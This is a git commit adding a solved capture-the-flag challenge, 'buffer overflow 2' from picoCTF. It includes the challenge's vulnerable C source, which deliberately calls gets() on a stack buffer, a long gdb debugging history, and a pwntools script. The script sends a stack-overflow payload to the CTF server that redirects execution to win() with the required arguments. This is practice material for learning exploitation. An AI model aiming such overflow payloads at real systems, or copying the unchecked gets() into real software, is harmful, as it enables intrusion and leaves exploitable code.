buffer overflow 2

2025-12-20 21:23:48 +01:00
parent 2359a500a2
commit 13815ed351
5 changed files with 245 additions and 0 deletions
--- a/buffer_overflow_2/.gdb_history
+++ b/buffer_overflow_2/.gdb_history
@@ -0,0 +1,176 @@
+r
+exit
+exit
+disassemble vuln
+b *vuln+44
+c
+c
+exit
+b *vuln+44
+c
+stackf
+disassemble vuln 
+b *vuln+29
+exit
+b *vuln+29
+c
+b *vuln+29
+continue
+disassemble vuln 
+b *vuln+44
+c
+stackf
+hexdump 
+hexdump 
+hexdump help
+hexdump $sp 20
+hexdump $sp 20
+hexdump $sp 100
+hexdump $sp 120
+hexdump $sp 140
+hexdump $sp 160
+c
+c
+b *vuln+44
+c
+stackf
+disassemble win
+b *win
+c
+stackf
+disassemble win
+b *win+11
+c
+stackf
+c
+b *win+11
+c
+c
+exit
+b *win+11
+c
+stackf
+nexti
+exit
+disassemble vuln
+b *vuln+75
+c
+disassemble vuln
+b *vuln+57
+c
+nexti
+stackf
+disassemble vuln
+disassemble win 
+hexdump $ebp+0x08
+stackf
+c
+disassemble win 
+b *win+118
+c
+c
+exit
+b *win+118
+c
+b *vuln+57
+c
+stackf
+nexti
+stackf
+disassemble win
+b *win+16
+c
+stackf
+disassemble win
+stackf
+hexdump $sp 100
+hexdump $sp 200
+c
+c
+b *win+16
+c
+hexdump $sp 200
+stackf
+c
+c
+c
+exit
+c
+stackf
+disassemble win
+b *win+7
+exit
+b *win+7
+c
+stackf
+hexdump $sp 200
+c
+exit
+b *win+7
+c
+stackf
+hexdump $sp 200
+disassemble *main
+exit
+b *win+7
+c
+stackf
+hexdump $sp 200
+disassemble *win
+nexti
+disassemble *win
+nexti
+disassemble *win
+nexti
+disassemble *win
+hexdump $sp 200
+nexti
+hexdump $sp 200
+c
+c
+exit
+disassemble *win
+b *win+118
+c
+stackf
+hexdump $sp 200
+disassemble *win
+b *win+118
+c
+hexdump $sp 200
+disassemble *win
+hexdump $ebp
+b *win+118
+c
+disassemble *win
+stackf
+c
+c
+exit
+b *win+118
+c
+stackf
+disassemble win
+hexdump $ebp
+hexdump $ebp+8
+nexti
+nexti
+stackf
+b *win+118
+c
+nexti 
+nexti 
+hexdump $ebp
+hexdump $ebp+8
+hexdump $ebp+12
+c
+b *win+118
+c
+stackf
+disassemble win
+b *win+143
+c
+disassemble win
+nexti
+c
+exit
--- a/buffer_overflow_2/flag.txt
+++ b/buffer_overflow_2/flag.txt
@@ -0,0 +1 @@
+{test}
--- a/buffer_overflow_2/sol.py
+++ b/buffer_overflow_2/sol.py
@@ -0,0 +1,24 @@
+#!/usr/bin/env python
+from pwn import *
+context.terminal = "kitty"
+
+win_address = 0x08049296
+
+buffer_base = 0xfffe422c
+ret_location = 0xfffe429c
+ret_offset = ret_location - buffer_base
+
+ebp_offset = 112
+arg1 = 0xCAFEF00D
+arg2 = 0xF00DF00D
+
+conn = remote("saturn.picoctf.net", 56706)
+#conn = process("./vuln")
+#attach(conn)
+
+conn.recvline()
+conn.writeline(flat({ebp_offset+0x8:arg1, ebp_offset+0xc:arg2, ret_offset:win_address}, word_size=32))
+conn.recvline()
+rest = conn.recvuntil(b'}')
+log.info(f"got {rest}")
+
--- a/buffer_overflow_2/vuln
+++ b/buffer_overflow_2/vuln
--- a/buffer_overflow_2/vuln.c
+++ b/buffer_overflow_2/vuln.c
@@ -0,0 +1,44 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include <sys/types.h>
+
+#define BUFSIZE 100
+#define FLAGSIZE 64
+
+void win(unsigned int arg1, unsigned int arg2) {
+  char buf[FLAGSIZE];
+  FILE *f = fopen("flag.txt","r");
+  if (f == NULL) {
+    printf("%s %s", "Please create 'flag.txt' in this directory with your",
+                    "own debugging flag.\n");
+    exit(0);
+  }
+
+  fgets(buf,FLAGSIZE,f);
+  if (arg1 != 0xCAFEF00D)
+    return;
+  if (arg2 != 0xF00DF00D)
+    return;
+  printf(buf);
+}
+
+void vuln(){
+  char buf[BUFSIZE];
+  gets(buf);
+  puts(buf);
+}
+
+int main(int argc, char **argv){
+
+  setvbuf(stdout, NULL, _IONBF, 0);
+  
+  gid_t gid = getegid();
+  setresgid(gid, gid, gid);
+
+  puts("Please enter your string: ");
+  vuln();
+  return 0;
+}
+